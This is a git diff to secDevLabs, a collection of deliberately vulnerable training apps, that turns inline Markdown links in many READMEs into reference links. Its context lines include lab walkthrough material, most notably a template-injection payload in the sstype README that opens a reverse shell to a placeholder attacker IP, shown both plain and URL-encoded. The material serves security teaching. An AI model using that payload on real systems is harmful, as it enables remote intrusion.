+ 
+
- 
+ 
-
+
- 
+ 
- 
+ 
- 
+ 
- 
+ 
- 
+ 
-Cool Games is a Flutter powered mobile app that serves as the mobile version of [GamesIRADOS.com](https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2017-apps/a10/games-irados). It is built with a mobile front-end and a Golang powered back-end.
+Cool Games is a Flutter powered mobile app that serves as the mobile version of [GamesIRADOS.com][GamesIRADOScom]. It is built with a mobile front-end and a Golang powered back-end.
## Index
@@ -25,7 +25,7 @@ The main goal of this app is to discuss how **Insecure Data Storage** vulnerabil
Before we start, it's important to mention that this app's code is divided into two parts: a back-end server, which can be found in the `server` folder, and the mobile app's code itself in the `mobile` folder. In order for the app to run as intended, the back-end server must be up and running, but no need to worry, we'll walk you through it! 😁
-To start this intentionally **insecure application**, you will need [Flutter][VS-Code-Flutter], [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you'll need to start the server, which can be done through the commands:
+To start this intentionally **insecure application**, you will need [Flutter][VS-Code-Flutter], [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs][secDevLabs], you'll need to start the server, which can be done through the commands:
### Start server commands:
@@ -178,14 +178,18 @@ How would you mitigate this vulnerability? After your changes, an attacker shoul
## PR solutions
-[Spoiler alert 🚨] To understand how this vulnerability can be mitigated, check out [these pull requests](https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+label%3A%22Cool+Games%22+label%3A%22mitigation+solution+%F0%9F%94%92%22)!
+[Spoiler alert 🚨] To understand how this vulnerability can be mitigated, check out [these pull requests][these pull requests]!
## Contributing
We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉
+
+[GamesIRADOScom]: https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2021-apps/a9/games-irados
+[secDevLabs]: https://github.com/globocom/secDevLabs
[API-Version-Issue]: https://github.com/globocom/secDevLabs/blob/master/docs/api-version-issue.md
[Flutter]: https://flutter.dev/docs/get-started/install
[VS-Code-Flutter]: https://github.com/globocom/secDevLabs/blob/master/docs/installing-flutter.md
[Docker Install]: https://docs.docker.com/install/
[Docker Compose Install]: https://docs.docker.com/compose/install/
+[these pull requests]:https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+is%3Aclosed+label%3AM2-OWASP-2016+label%3A%22Cool+Games%22
\ No newline at end of file
diff --git a/owasp-top10-2016-mobile/m4/note-box/README.md b/owasp-top10-2016-mobile/m4/note-box/README.md
index f25822fd3..2f5d7a3f1 100644
--- a/owasp-top10-2016-mobile/m4/note-box/README.md
+++ b/owasp-top10-2016-mobile/m4/note-box/README.md
@@ -25,7 +25,7 @@ The main goal of this app is to discuss how **Insecure Authentication** vulnerab
Before we start, it's important to mention that this app's code is divided into two parts: a back-end server, which can be found in the `server` folder, and the mobile app's code itself in the `mobile` folder. In order for the app to run as intended, the back-end server must be up and running, but no need to worry, we'll walk you through it! 😁
-To start this intentionally **insecure application**, you will need [Flutter][VS-Code-Flutter], [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you'll need to start the server, which can be done through the commands:
+To start this intentionally **insecure application**, you will need [Flutter][VS-Code-Flutter], [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs][secDevLabs], you'll need to start the server, which can be done through the commands:
### Start server commands:
@@ -126,13 +126,15 @@ How would you mitigate this vulnerability? After your changes, an attacker shoul
## PR solutions
-[Spoiler alert 🚨] To understand how this vulnerability can be mitigated, check out [these pull requests](https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+label%3A%22mitigation+solution+%F0%9F%94%92%22+label%3A%22Note+Box%22)!
+[Spoiler alert 🚨] To understand how this vulnerability can be mitigated, check out [these pull requests][these pull requests]!
## Contributing
We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉
+[secDevLabs]: (https://github.com/globocom/secDevLabs)
[Flutter]: https://flutter.dev/docs/get-started/install
[VS-Code-Flutter]: ../../../docs/installing-flutter.md
[Docker Install]: https://docs.docker.com/install/
[Docker Compose Install]: https://docs.docker.com/compose/install/
+[these pull requests]:https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+is%3Aclosed+label%3AM2-OWASP-2016+label%3A%22Cool+Games%22
\ No newline at end of file
diff --git a/owasp-top10-2016-mobile/m5/panda_zap/README.md b/owasp-top10-2016-mobile/m5/panda_zap/README.md
index 6b8a4a81d..4c82599b7 100644
--- a/owasp-top10-2016-mobile/m5/panda_zap/README.md
+++ b/owasp-top10-2016-mobile/m5/panda_zap/README.md
@@ -25,7 +25,7 @@ The main goal of this app is to discuss how **Insufficient Cryptography** vulner
Before we start, it's important to mention that this app's code is divided into two parts: a back-end server, which can be found in the `server` folder, and the mobile app's code itself in the `mobile` folder. In order for the app to run as intended, the back-end server must be up and running, but no need to worry, we'll walk you through it! 😁
-To start this intentionally **insecure application**, you will need [Flutter][VS-Code-Flutter], [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you'll need to start the server, which can be done through the commands:
+To start this intentionally **insecure application**, you will need [Flutter][VS-Code-Flutter], [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs][secDevLabs], you'll need to start the server, which can be done through the commands:
### Start server commands:
@@ -107,7 +107,7 @@ To enter the conversation, click the message bubble. After that, it's possible t
### 🔥
-If an attacker came into possession of the device and used the [Android Debug Bridge](https://developer.android.com/studio/command-line/adb) tool to communicate with it through a Unix shell, he could inspect how the app behaves and what it logs.
+If an attacker came into possession of the device and used the [Android Debug Bridge][Android Debug Bridge] tool to communicate with it through a Unix shell, he could inspect how the app behaves and what it logs.
To begin, it is possible to list connected devices with the following command:
@@ -167,11 +167,11 @@ Having access to the app's log, it's possible to see that a certain key seems to
-Now in possession of the key and by having a look at the app's code, it's possible to see that a [Caesar Cipher](https://en.wikipedia.org/wiki/Caesar_cipher) encryption mechanism is being used.
+Now in possession of the key and by having a look at the app's code, it's possible to see that a [Caesar Cipher][Caesar Cipher] encryption mechanism is being used.
In cryptography, a Caesar cipher is an encryption technique in which each letter is shifted by a fixed number of positions down the alphabet. Even though we appear to have what seems to be the shift value, logged as being the `key`, due to the fact of limited letters in the alphabet (25 in English), the cipher can easily be broken in a brute force attack.
-If an attacker were connected to the same network as someone using the app, it would be possible to capture and inspect the packets being transmitted using [Wireshark](https://www.wireshark.org/). To better narrow our search, we can filter for the port the app seems to be using, `11005`, as shown by the image below:
+If an attacker were connected to the same network as someone using the app, it would be possible to capture and inspect the packets being transmitted using [Wireshark][Wireshark]. To better narrow our search, we can filter for the port the app seems to be using, `11005`, as shown by the image below:
@@ -198,7 +198,8 @@ How would you mitigate this vulnerability? After your changes, the app should no
## PR solutions
-[Spoiler alert 🚨] To understand how this vulnerability can be mitigated, check out [these pull requests](https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+label%3A%22Panda+Zap%22+label%3A%22mitigation+solution+%F0%9F%94%92%22+)!
+[Spoiler alert 🚨] To understand how this vulnerability can be mitigated, check out [these pull requests][these pull requests]!
+
## Contributing
@@ -209,3 +210,8 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing
[VS-Code-Flutter]: https://github.com/globocom/secDevLabs/blob/master/docs/installing-flutter.md
[Docker Install]: https://docs.docker.com/install/
[Docker Compose Install]: https://docs.docker.com/compose/install/
+[these pull requests]:https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+is%3Aclosed+label%3AM2-OWASP-2016+label%3A%22Cool+Games%22
+[secDevLabs]: (https://github.com/globocom/secDevLabs)
+[Android Debug Bridge]: https://developer.android.com/studio/command-line/adb
+[Caesar Cipher]: https://en.wikipedia.org/wiki/Caesar_cipher
+[Wireshark]: https://www.wireshark.org/)
\ No newline at end of file
diff --git a/owasp-top10-2021-apps/a1/camplake-api/README.md b/owasp-top10-2021-apps/a1/camplake-api/README.md
index 7c8cb8d7b..12824a671 100644
--- a/owasp-top10-2021-apps/a1/camplake-api/README.md
+++ b/owasp-top10-2021-apps/a1/camplake-api/README.md
@@ -25,7 +25,7 @@ The main goal of this app is to discuss how **Broken Access Control** vulnerabil
## Setup
-To start this intentionally **insecure application**, you will need [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start:
+To start this intentionally **insecure application**, you will need [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start:
```sh
cd secDevLabs/owasp-top10-2021-apps/a1/camp-lake-api
diff --git a/owasp-top10-2021-apps/a1/ecommerce-api/README.md b/owasp-top10-2021-apps/a1/ecommerce-api/README.md
index 76fc0655b..290b4ffce 100644
--- a/owasp-top10-2021-apps/a1/ecommerce-api/README.md
+++ b/owasp-top10-2021-apps/a1/ecommerce-api/README.md
@@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Broken Access Control** vulnerabil
## Setup
-To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start:
+To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start:
```sh
cd secDevLabs/owasp-top10-2021-apps/a1/ecommerce-api
@@ -120,3 +120,4 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing
[app]: http://localhost:10005
[secdevlabs]: https://github.com/globocom/secDevLabs
[2]: https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2017-apps/a5/ecommerce-api
+[secDevLabs]: https://github.com/globocom/secDevLabs
\ No newline at end of file
diff --git a/owasp-top10-2021-apps/a1/tictactoe/README.md b/owasp-top10-2021-apps/a1/tictactoe/README.md
index a47df86cc..1c438363d 100644
--- a/owasp-top10-2021-apps/a1/tictactoe/README.md
+++ b/owasp-top10-2021-apps/a1/tictactoe/README.md
@@ -21,7 +21,7 @@ The main goal of this app is to discuss how **Broken Access Control** vulnerabil
## Setup
-To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start:
+To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start:
```sh
@@ -207,4 +207,5 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing
[docker compose install]: https://docs.docker.com/compose/install/
[app]: http://localhost.:10005
[secdevlabs]: https://github.com/globocom/secDevLabs
+[secDevLabs]: https://github.com/globocom/secDevLabs
[2]: https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2021-apps/a1/tictactoe
diff --git a/owasp-top10-2021-apps/a2/snake-pro/README.md b/owasp-top10-2021-apps/a2/snake-pro/README.md
index 7522e0344..8b3693212 100644
--- a/owasp-top10-2021-apps/a2/snake-pro/README.md
+++ b/owasp-top10-2021-apps/a2/snake-pro/README.md
@@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Cryptographic Failure** vulnerabil
## Setup
-To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start:
+To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start:
```sh
cd secDevLabs/owasp-top10-2021-apps/a2/snake-pro
@@ -68,7 +68,7 @@ Additionally, the channel is being used by users to send their sensitive data is
### 🔥
-If the database is somehow exposed, all users' passwords will be leaked, as shown on these MongoDB documents. To view them, you can locally install [Robo 3T](https://robomongo.org/download) and use default credentials used in `config.yml`:
+If the database is somehow exposed, all users' passwords will be leaked, as shown on these MongoDB documents. To view them, you can locally install [Robo 3T][Robo 3T] and use default credentials used in `config.yml`:
```
Database: snake_pro
@@ -118,3 +118,6 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing
[docker compose install]: https://docs.docker.com/compose/install/
[app]: http://localhost:10003
[dirb]: https://tools.kali.org/web-applications/dirb
+[Robo 3T]: https://robomongo.org/download
+[secDevLabs]: https://github.com/globocom/secDevLabs
+
diff --git a/owasp-top10-2021-apps/a3/comment-killer/README.md b/owasp-top10-2021-apps/a3/comment-killer/README.md
index 3db118056..5b48d6108 100644
--- a/owasp-top10-2021-apps/a3/comment-killer/README.md
+++ b/owasp-top10-2021-apps/a3/comment-killer/README.md
@@ -27,7 +27,7 @@ The main goal of this app is to discuss how **Cross-Site Scripting** vulnerabili
## Setup
-To start this intentionally **insecure application**, you will need [Docker](https://docs.docker.com/get-docker/) and [Docker Compose](https://docs.docker.com/compose/install/). After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start:
+To start this intentionally **insecure application**, you will need [Docker][Docker] and [Docker Compose][Docker Compose]. After forking [secDevLabs][secDevLabs], you must type the following commands to start:
```bash
cd secDevLabs/owasp-top10-2021-apps/a3/comment-killer
@@ -96,7 +96,7 @@ func handler(c echo.Context) error {
}
```
-In order to start the API, the following command can be used (you should check this [guide](https://golang.org/doc/install) if you need any help with Golang):
+In order to start the API, the following command can be used (you should check this [guide][guide] if you need any help with Golang):
```sh
go run main.go
@@ -157,3 +157,7 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing
[docker install]: https://docs.docker.com/install/
[docker compose install]: https://docs.docker.com/compose/install/
[app]: http://localhost:10007
+[Docker]: https://docs.docker.com/get-docker/
+[Docker Compose]: https://docs.docker.com/compose/install/
+[guide]: https://golang.org/doc/install
+[secDevLabs]: https://github.com/globocom/secDevLabs
diff --git a/owasp-top10-2021-apps/a3/copy-n-paste/README.md b/owasp-top10-2021-apps/a3/copy-n-paste/README.md
index 6ef40a6bb..b16f9741b 100644
--- a/owasp-top10-2021-apps/a3/copy-n-paste/README.md
+++ b/owasp-top10-2021-apps/a3/copy-n-paste/README.md
@@ -21,7 +21,7 @@ The main goal of this project is to discuss how **SQL Injection** vulnerabilitie
## Setup
-To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start:
+To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start:
```sh
cd secDevLabs/owasp-top10-2021-apps/a3/copy-n-paste
@@ -106,7 +106,7 @@ Request:
#### 🔥
-An attacker could now create any malicious SQL queries and send them to the API that, in theory, would be executed. For this attack narrative, [sqlmap](https://github.com/sqlmapproject/sqlmap) will be used to exemplify how an automated SQL Injection attack may be performed.
+An attacker could now create any malicious SQL queries and send them to the API that, in theory, would be executed. For this attack narrative, [sqlmap][sqlmap] will be used to exemplify how an automated SQL Injection attack may be performed.
To install sqlmap on a Mac you can simply type:
@@ -169,6 +169,9 @@ How could you now mitigate this vulnerability? After your code modification, an
We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉
+
+[secDevLabs]: https://github.com/globocom/secDevLabs
[docker install]: https://docs.docker.com/install/
[docker compose install]: https://docs.docker.com/compose/install/
[app]: http://localhost:10001
+[sqlmap]: https://github.com/sqlmapproject/sqlmap
\ No newline at end of file
diff --git a/owasp-top10-2021-apps/a3/gossip-world/README.md b/owasp-top10-2021-apps/a3/gossip-world/README.md
index b913a717e..8fb154726 100644
--- a/owasp-top10-2021-apps/a3/gossip-world/README.md
+++ b/owasp-top10-2021-apps/a3/gossip-world/README.md
@@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Cross-Site Scripting** vulnerabili
## Setup
-To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start:
+To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start:
```sh
cd secDevLabs/owasp-top10-2021-apps/a3/gossip-world
@@ -99,7 +99,7 @@ func handler(c echo.Context) error {
}
```
-To run this code simply type the following command in your terminal (you should check this [guide](https://golang.org/doc/install) if you need any help with Golang):
+To run this code simply type the following command in your terminal (you should check this [guide][guide] if you need any help with Golang):
```sh
go run main.go
@@ -145,6 +145,8 @@ How would you mitigate this vulnerability? After your changes, an attacker shoul
We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉
+[guide]: https://golang.org/doc/install
[docker install]: https://docs.docker.com/install/
[docker compose install]: https://docs.docker.com/compose/install/
[app]: http://localhost:10007
+[guide]: https://golang.org/doc/install
diff --git a/owasp-top10-2021-apps/a3/mongection/README.md b/owasp-top10-2021-apps/a3/mongection/README.md
index 86151cb6e..2e24b7bb3 100644
--- a/owasp-top10-2021-apps/a3/mongection/README.md
+++ b/owasp-top10-2021-apps/a3/mongection/README.md
@@ -21,7 +21,7 @@ The main goal of this project is to discuss how **NoSQL Injection** vulnerabilit
## Setup
-To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start:
+To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start:
```sh
cd secDevLabs/owasp-top10-2021-apps/a3/mongection
@@ -62,7 +62,7 @@ Now that you know the purpose of this app, what could go wrong? The following se
#### Lack of input validation allows injection of NoSQL queries
-After reviewing [db.js](https://github.com/globocom/secDevLabs/blob/master/owasp-top10-2021-apps/a3/mongection/src/db.js) file, it was possible to see that some input from users is concatenated with NoSQL queries, as shown in the following code snippets:
+After reviewing [db.js][db.js] file, it was possible to see that some input from users is concatenated with NoSQL queries, as shown in the following code snippets:
```js
const existUser = await User.findOne({ email: email });
@@ -120,6 +120,8 @@ How could you now mitigate this vulnerability? After your code modification, an
We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉
+[secDevLabs]: https://github.com/globocom/secDevLabs
[docker install]: https://docs.docker.com/install/
[docker compose install]: https://docs.docker.com/compose/install/
[app]: http://localhost:10001
+[db.js]: https://github.com/globocom/secDevLabs/blob/master/owasp-top10-2021-apps/a3/mongection/src/db.js
\ No newline at end of file
diff --git a/owasp-top10-2021-apps/a3/sstype/README.md b/owasp-top10-2021-apps/a3/sstype/README.md
index db055c58a..ca702d007 100644
--- a/owasp-top10-2021-apps/a3/sstype/README.md
+++ b/owasp-top10-2021-apps/a3/sstype/README.md
@@ -21,7 +21,7 @@ The main goal of this project is to discuss how **Server-Side Template Injection
## Setup
-To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start:
+To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start:
```sh
cd secDevLabs/owasp-top10-2021-apps/a3/sstype
@@ -127,7 +127,7 @@ Don't forget to replace `ATTACKER-IP` and `ATTACKER-PORT` below!
{%import os%}{{os.popen("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER-IP\",ATTACKER-PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);'").read()}}
```
-However, as there might be some special characters in this string, we need to escape them before injecting it in the vulnerable application (this [online URL encoder](https://www.urlencoder.org/) may help) and hope for a shell:
+However, as there might be some special characters in this string, we need to escape them before injecting it in the vulnerable application (this [online URL encoder][online URL encoder] may help) and hope for a shell:
```python
%7B%25import%20os%25%7D%7B%7Bos.popen%28%22python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%5C%22ATTACKER-IP%5C%22%2CATTACKER-PORT%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3B%20os.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%5C%22%2Fbin%2Fbash%5C%22%2C%5C%22-i%5C%22%5D%29%3B%27%22%29.read%28%29%7D%7D
@@ -147,6 +147,8 @@ How could you now mitigate this vulnerability? After your code modification, an
We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉
+[secDevLabs]: https://github.com/globocom/secDevLabs
[docker install]: https://docs.docker.com/install/
[docker compose install]: https://docs.docker.com/compose/install/
[app]: http://localhost:10001
+[online URL encoder]: https://www.urlencoder.org/
diff --git a/owasp-top10-2021-apps/a3/streaming/README.md b/owasp-top10-2021-apps/a3/streaming/README.md
index a321c47e3..087d26da5 100644
--- a/owasp-top10-2021-apps/a3/streaming/README.md
+++ b/owasp-top10-2021-apps/a3/streaming/README.md
@@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Cross-Site Scripting** vulnerabili
## Setup
-To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start:
+To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start:
```sh
cd secDevLabs/owasp-top10-2021-apps/a3/streaming
@@ -106,4 +106,5 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing
[docker install]: https://docs.docker.com/install/
[docker compose install]: https://docs.docker.com/compose/install/
+[secDevLabs]: https://github.com/globocom/secDevLabs
[app]: http://localhost:10007
diff --git a/owasp-top10-2021-apps/a5/misconfig-wordpress/README.md b/owasp-top10-2021-apps/a5/misconfig-wordpress/README.md
index ace652ed1..c84b9eeb4 100644
--- a/owasp-top10-2021-apps/a5/misconfig-wordpress/README.md
+++ b/owasp-top10-2021-apps/a5/misconfig-wordpress/README.md
@@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Security Misconfiguration** vulner
## Setup
-To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start:
+To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start:
```sh
cd secDevLabs/owasp-top10-2021-apps/a5/misconfig-wordpress
@@ -69,7 +69,7 @@ An attacker could try to log in with the username: `admin` and realize, through
### 🔥
-At this moment, an attacker could use [Burp Suite](https://portswigger.net/burp) to perform a brute force attack using this [wordlist] (if you need any help setting up your proxy you should check this [guide](https://support.portswigger.net/customer/portal/articles/1783066-configuring-firefox-to-work-with-burp)). To do so, after finding the login POST request, right click and send to Intruder, as shown below:
+At this moment, an attacker could use [Burp Suite][Burp Suite] to perform a brute force attack using this [wordlist] (if you need any help setting up your proxy you should check this [guide][guide]). To do so, after finding the login POST request, right click and send to Intruder, as shown below:
@@ -222,9 +222,12 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing
[docker install]: https://docs.docker.com/install/
[docker compose install]: https://docs.docker.com/compose/install/
+[secDevLabs]: https://github.com/globocom/secDevLabs
[app]: http://localhost:8000
[wordlist]: https://github.com/danielmiessler/SecLists/blob/master/Passwords/UserPassCombo-Jay.txt
[wpscan]: https://wpscan.org/
[malicious code]: https://www.exploit-db.com/exploits/44949
[nikto]: https://cirt.net/Nikto2
[searchsploit]: https://www.exploit-db.com/searchsploit
+[Burp Suite]: https://portswigger.net/burp
+[guide]: https://support.portswigger.net/customer/portal/articles/1783066-configuring-firefox-to-work-with-burp
diff --git a/owasp-top10-2021-apps/a5/stegonography/README.md b/owasp-top10-2021-apps/a5/stegonography/README.md
index d59d205cb..559cd791c 100644
--- a/owasp-top10-2021-apps/a5/stegonography/README.md
+++ b/owasp-top10-2021-apps/a5/stegonography/README.md
@@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Security Misconfiguration** vulner
## Setup
-To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start:
+To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start:
```sh
cd secDevLabs/owasp-top10-2021-apps/a5/stegonography
@@ -135,7 +135,9 @@ How would you mitigate this vulnerability? After your changes, an attacker shoul
We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉
+
[docker install]: https://docs.docker.com/install/
[docker compose install]: https://docs.docker.com/compose/install/
+[secDevLabs]: https://github.com/globocom/secDevLabs
[app]: http://localhost:10006
[dirb]: https://tools.kali.org/web-applications/dirb
diff --git a/owasp-top10-2021-apps/a5/vinijr-blog/README.md b/owasp-top10-2021-apps/a5/vinijr-blog/README.md
index 7dde735a1..3bd7291c8 100644
--- a/owasp-top10-2021-apps/a5/vinijr-blog/README.md
+++ b/owasp-top10-2021-apps/a5/vinijr-blog/README.md
@@ -23,7 +23,7 @@ The main goal of this app is to discuss how **XXE** vulnerabilities can be explo
## Setup
-To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start:
+To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start:
```sh
cd secDevLabs/owasp-top10-2021-apps/a5/vinijr-blog
@@ -54,11 +54,11 @@ After reviewing the inputs from the app, it is possible to identify that the sec
-Using [Burp Suite](https://portswigger.net/burp) proxy to intercept this request (POST to contact.php) reveals that the message is being built using an XML (if you need any help setting up your proxy you should check this [guide](https://support.portswigger.net/customer/portal/articles/1783066-configuring-firefox-to-work-with-burp)):
+Using [Burp Suite][Burp Suite] proxy to intercept this request (POST to contact.php) reveals that the message is being built using an XML (if you need any help setting up your proxy you should check this [guide][guide]:
-To replicate this POST using [curl](https://curl.haxx.se/), create the following file `payload.xml`:
+To replicate this POST using [curl][curl], create the following file `payload.xml`:
```XML
@@ -82,7 +82,7 @@ By checking the source code of the [file](../vinijr-blog/app/contact.php), it is
### 🔥
-As no validation is being used to avoid [ENTITIES](https://www.w3schools.com/xml/xml_dtd_entities.asp) being sent to the PHP file, an attacker could create the following `evilxml.xml` to perform a XXE:
+As no validation is being used to avoid [ENTITIES][ENTITIES] being sent to the PHP file, an attacker could create the following `evilxml.xml` to perform a XXE:
```XML
@@ -121,4 +121,9 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing
[docker install]: https://docs.docker.com/install/
[docker compose install]: https://docs.docker.com/compose/install/
+[secDevLabs]: https://github.com/globocom/secDevLabs
[app]: http://localhost:10004
+[Burp Suite]: https://portswigger.net/burp
+[guide]: https://support.portswigger.net/customer/portal/articles/1783066-configuring-firefox-to-work-with-burp
+[curl]: https://curl.haxx.se/
+[ENTITIES]: https://www.w3schools.com/xml/xml_dtd_entities.asp
\ No newline at end of file
diff --git a/owasp-top10-2021-apps/a6/cimentech/README.md b/owasp-top10-2021-apps/a6/cimentech/README.md
index a888c91c9..d19b63045 100644
--- a/owasp-top10-2021-apps/a6/cimentech/README.md
+++ b/owasp-top10-2021-apps/a6/cimentech/README.md
@@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Vulnerable and Outdated Components
## Setup
-To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start:
+To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start:
```sh
cd secDevLabs/owasp-top10-2021-apps/a6/cimentech
@@ -65,7 +65,7 @@ Having the CMS version, it's possible to check on [exploit-db][3] if there are a
-By using [searchsploit](https://www.exploit-db.com/searchsploit), an attacker could also find this same result via a terminal. To install it, simply type the following in your OSX terminal (keep in mind it might trigger your anti-virus software) :
+By using [searchsploit][searchsploit], an attacker could also find this same result via a terminal. To install it, simply type the following in your OSX terminal (keep in mind it might trigger your anti-virus software) :
```sh
⚠️ 'The next command will install several exploit codes in your system and many of them may trigger antiviruses alerts'
@@ -125,6 +125,8 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing
[docker install]: https://docs.docker.com/install/
[docker compose install]: https://docs.docker.com/compose/install/
+[secDevLabs]: https://github.com/globocom/secDevLabs
+[searchsploit]: https://www.exploit-db.com/searchsploit
[app]: http://localhost:80
[secdevlabs]: https://github.com/globocom/secDevLabs
[1]: https://www.ruby-lang.org/en/documentation/installation/
diff --git a/owasp-top10-2021-apps/a6/golden-hat/README.md b/owasp-top10-2021-apps/a6/golden-hat/README.md
index 4b66e20c9..8ad8ef917 100644
--- a/owasp-top10-2021-apps/a6/golden-hat/README.md
+++ b/owasp-top10-2021-apps/a6/golden-hat/README.md
@@ -67,7 +67,7 @@ Once we try reaching the `/golden.secret` we can see interesting headers:
